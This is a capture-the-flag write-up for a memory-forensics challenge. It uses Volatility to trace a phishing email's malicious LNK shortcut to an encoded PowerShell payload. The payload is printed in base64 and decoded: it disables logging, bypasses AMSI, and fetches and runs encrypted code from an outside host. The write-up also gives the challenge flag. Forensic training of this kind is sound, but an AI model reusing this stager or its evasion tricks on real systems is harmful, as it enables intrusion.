For this question, I use Volatility to solve it. You can try to use Volatility Workbench. For me, it seems like not working properly (or I’m just too noob to use it).
First, download the file reminiscent.zip from the site. Extract it. You should see file named:
- flounder-pc-memdump.elf
- imageinfo.txt
- Resume.eml
If you open the email file “Resume.eml“, you’ll find it contain a link “resume.zip“.
Based on clue/hint given:
Our recruiter mentioned he received an email from someone regarding their resume.
So maybe the recruiter opened the attachment from the email and something malicious happened.
To start analyzing this incident, we can use Volatility & dig further using the memdump “flounder-pc-memdump.elf“.
Usually, when I start doing memory forensic, I will try to determine which profile suitable to be used. To start with, run this command:
python vol.py -f flounder-pc-memdump.elf imageinfo
If thing goes correctly, you should see something like this:
So we’ll be using profile “Win7SP1x64_23418” for our investigation.
Next, we’ll try to see what were the running processes using “pstree“. This plugin used to display the processes and their parent processes. Run command as below:
python vol.py -f flounder-pc-memdump.elf --profile=Win7SP1x64_23418 pstree
You should see as below:
From this process list, we can see couple of suspicious process; e.g. Thunderbird (free email application) spawning powershell? hmm..
Also remember our recruiter mentioned that he received email from someone? So maybe the recruiter is using Thunderbird to open that email; which he accidentally opened the attachment.
So we lets see if the recruiter host machine contains file named “resume“:
python vol.py -f flounder-pc-memdump.elf --profile=Win7SP1x64_23418 filescan | grep -i resume
Now we know that on recruiter machine contains file name “resume.pdf.lnk“. LNK files are usually seen by users as shortcuts, and used in places like the Desktop and Start Menu.
Lets dump those 2 .lnk file for us to further investigate:
python vol.py -f flounder-pc-memdump.elf --profile=Win7SP1x64_23418 dumpfiles -n -i -r \\.lnk --dump-dir=reminiscent_output
You should see 2 file inside output folder.
Let’s see what’s inside that 2 file:
strings file.496.0xfffffa80017dcc60.resume.pdf.lnk.vacb
As you can see, it contains some base64 strings at below. Let’s analyze those base64 strings.
cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAFAAIAAtAHMAdABhACAALQB3ACAAMQAgAC0AZQBuAGMAIAAgAEoAQQBCAEgAQQBIAEkAQQBiAHcAQgBWAEEARgBBAEEAVQBBAEIAUABBAEUAdwBBAGEAUQBCAEQAQQBGAGsAQQBVAHcAQgBGAEEASABRAEEAZABBAEIASgBBAEUANABBAFIAdwBCAHoAQQBDAEEAQQBQAFEAQQBnAEEARgBzAEEAYwBnAEIARgBBAEUAWQBBAFgAUQBBAHUAQQBFAEUAQQBVAHcAQgB6AEEARwBVAEEAVABRAEIAQwBBAEUAdwBBAFcAUQBBAHUAQQBFAGMAQQBSAFEAQgAwAEEARgBRAEEAZQBRAEIAdwBBAEUAVQBBAEsAQQBBAG4AQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFQAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBFAEUAQQBkAFEAQgAwAEEARwA4AEEAYgBRAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgBWAEEASABRAEEAYQBRAEIAcwBBAEgATQBBAEoAdwBBAHAAQQBDADQAQQBJAGcAQgBIAEEARQBVAEEAZABBAEIARwBBAEUAawBBAFIAUQBCAGcAQQBHAHcAQQBaAEEAQQBpAEEAQwBnAEEASgB3AEIAagBBAEcARQBBAFkAdwBCAG8AQQBHAFUAQQBaAEEAQgBIAEEASABJAEEAYgB3AEIAMQBBAEgAQQBBAFUAQQBCAHYAQQBHAHcAQQBhAFEAQgBqAEEASABrAEEAVQB3AEIAbABBAEgAUQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQgB6AEEAQwBjAEEATABBAEEAZwBBAEMAYwBBAFQAZwBBAG4AQQBDAHMAQQBKAHcAQgB2AEEARwA0AEEAVQBBAEIAMQBBAEcASQBBAGIAQQBCAHAAQQBHAE0AQQBMAEEAQgBUAEEASABRAEEAWQBRAEIAMABBAEcAawBBAFkAdwBBAG4AQQBDAGsAQQBMAGcAQgBIAEEARQBVAEEAVgBBAEIAVwBBAEcARQBBAGIAQQBCAFYAQQBHAFUAQQBLAEEAQQBrAEEARwA0AEEAZABRAEIAcwBBAEUAdwBBAEsAUQBBADcAQQBDAFEAQQBSAHcAQgBTAEEARwA4AEEAZABRAEIAUQBBAEYAQQBBAFQAdwBCAHMAQQBFAGsAQQBRAHcAQgA1AEEARgBNAEEAWgBRAEIAVQBBAEYAUQBBAGEAUQBCAE8AQQBHAGMAQQBVAHcAQgBiAEEAQwBjAEEAVQB3AEIAagBBAEgASQBBAGEAUQBCAHcAQQBIAFEAQQBRAGcAQQBuAEEAQwBzAEEASgB3AEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAHcAQQBiAHcAQgBuAEEARwBjAEEAYQBRAEIAdQBBAEcAYwBBAEoAdwBCAGQAQQBGAHMAQQBKAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBCAFQAQQBHAE0AQQBjAGcAQgBwAEEASABBAEEAZABBAEIAQwBBAEMAYwBBAEsAdwBBAG4AQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAVABBAEIAdgBBAEcAYwBBAFoAdwBCAHAAQQBHADQAQQBaAHcAQQBuAEEARgAwAEEASQBBAEEAOQBBAEMAQQBBAE0AQQBBADcAQQBDAFEAQQBSAHcAQgBTAEEARwA4AEEAZABRAEIAUQBBAEYAQQBBAFQAdwBCAE0AQQBFAGsAQQBRAHcAQgBaAEEARgBNAEEAUgBRAEIAMABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBVAHcAQgBiAEEAQwBjAEEAVQB3AEIAagBBAEgASQBBAGEAUQBCAHcAQQBIAFEAQQBRAGcAQQBuAEEAQwBzAEEASgB3AEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAHcAQQBiAHcAQgBuAEEARwBjAEEAYQBRAEIAdQBBAEcAYwBBAEoAdwBCAGQAQQBGAHMAQQBKAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBCAFQAQQBHAE0AQQBjAGcAQgBwAEEASABBAEEAZABBAEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBNAEEARwA4AEEAWgB3AEIAbgBBAEcAawBBAGIAZwBCAG4AQQBDAGMAQQBYAFEAQQBnAEEARAAwAEEASQBBAEEAdwBBAEQAcwBBAFcAdwBCAFMAQQBHAFUAQQBaAGcAQgBkAEEAQwA0AEEAUQBRAEIAegBBAEYATQBBAFoAUQBCAHQAQQBFAEkAQQBiAEEAQgA1AEEAQwA0AEEAUgB3AEIAbABBAEYAUQBBAFYAQQBCADUAQQBGAEEAQQBSAFEAQQBvAEEAQwBjAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADAAQQBMAGcAQgBOAEEARwBFAEEAYgBnAEIAaABBAEcAYwBBAFoAUQBCAHQAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAUQBRAEIAMQBBAEgAUQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEUARQBBAGIAUQBCAHoAQQBHAGsAQQBWAFEAQgAwAEEARwBrAEEAYgBBAEIAegBBAEMAYwBBAEsAUQBCADgAQQBEADgAQQBlAHcAQQBrAEEARgA4AEEAZgBRAEIAOABBAEMAVQBBAGUAdwBBAGsAQQBGADgAQQBMAGcAQgBIAEEARQBVAEEAZABBAEIARwBBAEcAawBBAFoAUQBCAE0AQQBHAFEAQQBLAEEAQQBuAEEARwBFAEEAYgBRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBHAGsAQQBkAEEAQgBHAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAG4AQQBDAHcAQQBKAHcAQgBPAEEARwA4AEEAYgBnAEIAUQBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBzAEEARgBNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAGMAQQBLAFEAQQB1AEEARgBNAEEAUgBRAEIAVQBBAEYAWQBBAFkAUQBCAE0AQQBIAFUAQQBSAFEAQQBvAEEAQwBRAEEAVABnAEIAMQBBAEcAdwBBAFQAQQBBAHMAQQBDAFEAQQBWAEEAQgB5AEEASABVAEEAWgBRAEEAcABBAEgAMABBAE8AdwBCAGIAQQBGAE0AQQBlAFEAQgB6AEEARgBRAEEAWgBRAEIAdABBAEMANABBAFQAZwBCAGwAQQBGAFEAQQBMAGcAQgBUAEEARQBVAEEAYwBnAEIAVwBBAEUAawBBAFkAdwBCAGwAQQBGAEEAQQBUAHcAQgBKAEEARwA0AEEAZABBAEIATgBBAEUARQBBAGIAZwBCAEIAQQBHAGMAQQBSAFEAQgBTAEEARgAwAEEATwBnAEEANgBBAEUAVQBBAGUAQQBCAHcAQQBFAFUAQQBZAHcAQgAwAEEARABFAEEATQBBAEEAdwBBAEUATQBBAFQAdwBCAHUAQQBGAFEAQQBhAFEAQgB1AEEASABVAEEAUgBRAEEAOQBBAEQAQQBBAE8AdwBBAGsAQQBGAGMAQQBRAHcAQQA5AEEARQA0AEEAUgBRAEIAWABBAEMAMABBAFQAdwBCAEMAQQBHAG8AQQBSAFEAQgBqAEEARgBRAEEASQBBAEIAVABBAEgAawBBAGMAdwBCAFUAQQBFAFUAQQBUAFEAQQB1AEEARQA0AEEAUgBRAEIAMABBAEMANABBAFYAdwBCAGwAQQBFAEkAQQBRAHcAQgBzAEEARQBrAEEAUgBRAEIAdQBBAEgAUQBBAE8AdwBBAGsAQQBIAFUAQQBQAFEAQQBuAEEARQAwAEEAYgB3AEIANgBBAEcAawBBAGIAQQBCAHMAQQBHAEUAQQBMAHcAQQAxAEEAQwA0AEEATQBBAEEAZwBBAEMAZwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEEAZwBBAEUANABBAFYAQQBBAGcAQQBEAFkAQQBMAGcAQQB4AEEARABzAEEASQBBAEIAWABBAEUAOABBAFYAdwBBADIAQQBEAFEAQQBPAHcAQQBnAEEARgBRAEEAYwBnAEIAcABBAEcAUQBBAFoAUQBCAHUAQQBIAFEAQQBMAHcAQQAzAEEAQwA0AEEATQBBAEEANwBBAEMAQQBBAGMAZwBCADIAQQBEAG8AQQBNAFEAQQB4AEEAQwA0AEEATQBBAEEAcABBAEMAQQBBAGIAQQBCAHAAQQBHAHMAQQBaAFEAQQBnAEEARQBjAEEAWgBRAEIAagBBAEcAcwBBAGIAdwBBAG4AQQBEAHMAQQBKAEEAQgAzAEEARQBNAEEATABnAEIASQBBAEcAVQBBAFkAUQBCAEUAQQBHAFUAQQBjAGcAQgBUAEEAQwA0AEEAUQBRAEIAawBBAEcAUQBBAEsAQQBBAG4AQQBGAFUAQQBjAHcAQgBsAEEASABJAEEATABRAEIAQgBBAEcAYwBBAFoAUQBCAHUAQQBIAFEAQQBKAHcAQQBzAEEAQwBRAEEAZABRAEEAcABBAEQAcwBBAEoAQQBCAFgAQQBHAE0AQQBMAGcAQgBRAEEARgBJAEEAYgB3AEIAWQBBAEgAawBBAFAAUQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEARgBRAEEAWgBRAEIATgBBAEMANABBAFQAZwBCAEYAQQBGAFEAQQBMAGcAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBCADEAQQBFAFUAQQBjAHcAQgAwAEEARgAwAEEATwBnAEEANgBBAEUAUQBBAFoAUQBCAG0AQQBHAEUAQQBWAFEAQgBNAEEASABRAEEAVgB3AEIAbABBAEUASQBBAFUAQQBCAFMAQQBFADgAQQBXAEEAQgBaAEEARABzAEEASgBBAEIAMwBBAEUATQBBAEwAZwBCAFEAQQBGAEkAQQBiAHcAQgBZAEEARgBrAEEATABnAEIARABBAEYASQBBAFIAUQBCAEUAQQBHAFUAQQBUAGcAQgAwAEEARQBrAEEAWQBRAEIATQBBAEYATQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARgBrAEEAVQB3AEIAVQBBAEcAVQBBAFQAUQBBAHUAQQBFADQAQQBSAFEAQgBVAEEAQwA0AEEAUQB3AEIAeQBBAEcAVQBBAFIAQQBCAEYAQQBHADQAQQBWAEEAQgBwAEEARwBFAEEAVABBAEIARABBAEcARQBBAFEAdwBCAG8AQQBHAFUAQQBYAFEAQQA2AEEARABvAEEAUgBBAEIAbABBAEUAWQBBAFkAUQBCADEAQQBFAHcAQQBWAEEAQgBPAEEARQBVAEEAZABBAEIAMwBBAEUAOABBAGMAZwBCAHIAQQBFAE0AQQBjAGcAQgBsAEEARwBRAEEAWgBRAEIAdQBBAEgAUQBBAGEAUQBCAEIAQQBHAHcAQQBVAHcAQQA3AEEAQwBRAEEAUwB3AEEAOQBBAEYAcwBBAFUAdwBCAFoAQQBGAE0AQQBkAEEAQgBGAEEARQAwAEEATABnAEIAVQBBAEcAVQBBAGUAQQBCADAAQQBDADQAQQBSAFEAQgBPAEEARQBNAEEAVAB3AEIARQBBAEUAawBBAGIAZwBCAG4AQQBGADAAQQBPAGcAQQA2AEEARQBFAEEAVQB3AEIARABBAEUAawBBAFMAUQBBAHUAQQBFAGMAQQBSAFEAQgAwAEEARQBJAEEAZQBRAEIAMABBAEUAVQBBAGMAdwBBAG8AQQBDAGMAQQBSAFEAQQB4AEEARwBjAEEAVABRAEIASABBAEcAUQBBAFoAZwBCAFUAQQBFAEEAQQBaAFEAQgB2AEEARQA0AEEAUABnAEIANABBAEQAawBBAGUAdwBCAGQAQQBEAEkAQQBSAGcAQQAzAEEAQwBzAEEAWQBnAEIAegBBAEUAOABBAGIAZwBBADAAQQBDADgAQQBVAHcAQgBwAEEARgBFAEEAYwBnAEIAMwBBAEMAYwBBAEsAUQBBADcAQQBDAFEAQQBVAGcAQQA5AEEASABzAEEASgBBAEIARQBBAEMAdwBBAEoAQQBCAEwAQQBEADAAQQBKAEEAQgBCAEEASABJAEEAWgB3AEIAVABBAEQAcwBBAEoAQQBCAFQAQQBEADAAQQBNAEEAQQB1AEEAQwA0AEEATQBnAEEAMQBBAEQAVQBBAE8AdwBBAHcAQQBDADQAQQBMAGcAQQB5AEEARABVAEEATgBRAEIAOABBAEMAVQBBAGUAdwBBAGsAQQBFAG8AQQBQAFEAQQBvAEEAQwBRAEEAUwBnAEEAcgBBAEMAUQBBAFUAdwBCAGIAQQBDAFEAQQBYAHcAQgBkAEEAQwBzAEEASgBBAEIATABBAEYAcwBBAEoAQQBCAGYAQQBDAFUAQQBKAEEAQgBMAEEAQwA0AEEAUQB3AEIAdgBBAEgAVQBBAGIAZwBCAFUAQQBGADAAQQBLAFEAQQBsAEEARABJAEEATgBRAEEAMgBBAEQAcwBBAEoAQQBCAFQAQQBGAHMAQQBKAEEAQgBmAEEARgAwAEEATABBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAG8AQQBYAFEAQQA5AEEAQwBRAEEAVQB3AEIAYgBBAEMAUQBBAFMAZwBCAGQAQQBDAHcAQQBKAEEAQgBUAEEARgBzAEEASgBBAEIAZgBBAEYAMABBAGYAUQBBADcAQQBDAFEAQQBSAEEAQgA4AEEAQwBVAEEAZQB3AEEAawBBAEUAawBBAFAAUQBBAG8AQQBDAFEAQQBTAFEAQQByAEEARABFAEEASwBRAEEAbABBAEQASQBBAE4AUQBBADIAQQBEAHMAQQBKAEEAQgBJAEEARAAwAEEASwBBAEEAawBBAEUAZwBBAEsAdwBBAGsAQQBGAE0AQQBXAHcAQQBrAEEARQBrAEEAWABRAEEAcABBAEMAVQBBAE0AZwBBADEAQQBEAFkAQQBPAHcAQQBrAEEARgBNAEEAVwB3AEEAawBBAEUAawBBAFgAUQBBAHMAQQBDAFEAQQBVAHcAQgBiAEEAQwBRAEEAUwBBAEIAZABBAEQAMABBAEoAQQBCAFQAQQBGAHMAQQBKAEEAQgBJAEEARgAwAEEATABBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAGsAQQBYAFEAQQA3AEEAQwBRAEEAWAB3AEEAdABBAEcASQBBAGUAQQBCAHYAQQBGAEkAQQBKAEEAQgBUAEEARgBzAEEASwBBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAGsAQQBYAFEAQQByAEEAQwBRAEEAVQB3AEIAYgBBAEMAUQBBAFMAQQBCAGQAQQBDAGsAQQBKAFEAQQB5AEEARABVAEEATgBnAEIAZABBAEgAMABBAGYAUQBBADcAQQBDAFEAQQBkAHcAQgBqAEEAQwA0AEEAUwBBAEIARgBBAEUARQBBAFoAQQBCAEYAQQBIAEkAQQBjAHcAQQB1AEEARQBFAEEAUgBBAEIARQBBAEMAZwBBAEkAZwBCAEQAQQBHADgAQQBiAHcAQgByAEEARwBrAEEAWgBRAEEAaQBBAEMAdwBBAEkAZwBCAHoAQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEQAMABBAFQAUQBCAEQAQQBHAEUAQQBhAEEAQgAxAEEARgBFAEEAVgBnAEIAbQBBAEgAbwBBAE0AQQBCADUAQQBFADAAQQBOAGcAQgBXAEEARQBJAEEAWgBRAEEANABBAEcAWQBBAGUAZwBCAFcAQQBEAGsAQQBkAEEAQQA1AEEARwBvAEEAYgB3AEIAdABBAEcAOABBAFAAUQBBAGkAQQBDAGsAQQBPAHcAQQBrAEEASABNAEEAWgBRAEIAeQBBAEQAMABBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBAHUAQQBEAEUAQQBNAEEAQQB1AEEARABrAEEATwBRAEEAdQBBAEQAVQBBAE4AUQBBADYAQQBEAGcAQQBNAEEAQQBuAEEARABzAEEASgBBAEIAMABBAEQAMABBAEoAdwBBAHYAQQBHAHcAQQBiAHcAQgBuAEEARwBrAEEAYgBnAEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAZwBBAGMAQQBBAG4AQQBEAHMAQQBKAEEAQgBtAEEARwB3AEEAWQBRAEIAbgBBAEQAMABBAEoAdwBCAEkAQQBGAFEAQQBRAGcAQgA3AEEAQwBRAEEAWAB3AEIAcQBBAEQAQQBBAFIAdwBCAGYAQQBIAGsAQQBNAEEAQgAxAEEARgBJAEEAWAB3AEIATgBBAEQATQBBAGIAUQBBAHcAQQBIAEkAQQBXAFEAQgBmAEEAQwBRAEEAZgBRAEEAbgBBAEQAcwBBAEoAQQBCAEUAQQBHAEUAQQBkAEEAQgBCAEEARAAwAEEASgBBAEIAWABBAEUATQBBAEwAZwBCAEUAQQBHADgAQQBWAHcAQgBPAEEARQB3AEEAYgB3AEIAaABBAEUAUQBBAFIAQQBCAEIAQQBGAFEAQQBRAFEAQQBvAEEAQwBRAEEAVQB3AEIAbABBAEYASQBBAEsAdwBBAGsAQQBIAFEAQQBLAFEAQQA3AEEAQwBRAEEAYQBRAEIAMgBBAEQAMABBAEoAQQBCAGsAQQBHAEUAQQBWAEEAQgBCAEEARgBzAEEATQBBAEEAdQBBAEMANABBAE0AdwBCAGQAQQBEAHMAQQBKAEEAQgBFAEEARQBFAEEAZABBAEIAaABBAEQAMABBAEoAQQBCAEUAQQBHAEUAQQBWAEEAQgBoAEEARgBzAEEATgBBAEEAdQBBAEMANABBAEoAQQBCAEUAQQBFAEUAQQBkAEEAQgBoAEEAQwA0AEEAVABBAEIAbABBAEcANABBAFIAdwBCAFUAQQBFAGcAQQBYAFEAQQA3AEEAQwAwAEEAUwBnAEIAUABBAEUAawBBAFQAZwBCAGIAQQBFAE0AQQBTAEEAQgBCAEEASABJAEEAVwB3AEIAZABBAEYAMABBAEsAQQBBAG0AQQBDAEEAQQBKAEEAQgBTAEEAQwBBAEEASgBBAEIAawBBAEcARQBBAGQAQQBCAEIAQQBDAEEAQQBLAEEAQQBrAEEARQBrAEEAVgBnAEEAcgBBAEMAUQBBAFMAdwBBAHAAQQBDAGsAQQBmAEEAQgBKAEEARQBVAEEAVwBBAEEAPQA=
By using Cyberchef, the base64 strings appear to be another Powershell base64 encoded command:
powershell -noP -sta -w 1 -enc JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
After we decoded it, it appear to be some sort of Powershell instruction for the host machine with various hard-coded parameter e.g. hard-coded User-Agent, IP address, path & HTB flag 😉
$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GETValUe($nulL);$GRouPPOlICySeTTiNgS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GRouPPOLICYSEtTingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[Ref].AsSemBly.GeTTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVaLuE($NulL,$True)};[SysTem.NeT.SErVIcePOIntMAnAgER]::ExpEct100COnTinuE=0;$WC=NEW-OBjEcT SysTEM.NEt.WeBClIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HeaDerS.Add('User-Agent',$u);$Wc.PRoXy=[SysTeM.NET.WebRequEst]::DefaULtWeBPROXY;$wC.PRoXY.CREDeNtIaLS = [SYSTeM.NET.CreDEnTiaLCaChe]::DeFauLTNEtwOrkCredentiAlS;$K=[SYStEM.Text.ENCODIng]::ASCII.GEtBytEs('E1gMGdfT@eoN>x9{]2F7+bsOn4/SiQrw');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$wc.HEAdErs.ADD("Cookie","session=MCahuQVfz0yM6VBe8fzV9t9jomo=");$ser='http://10.10.99.55:80';$t='/login/process.php';$flag='HTB{$_j0G_y0uR_M3m0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX
So there you go. The flag is HTB{$_j0G_y0uR_M3m0rY_$}.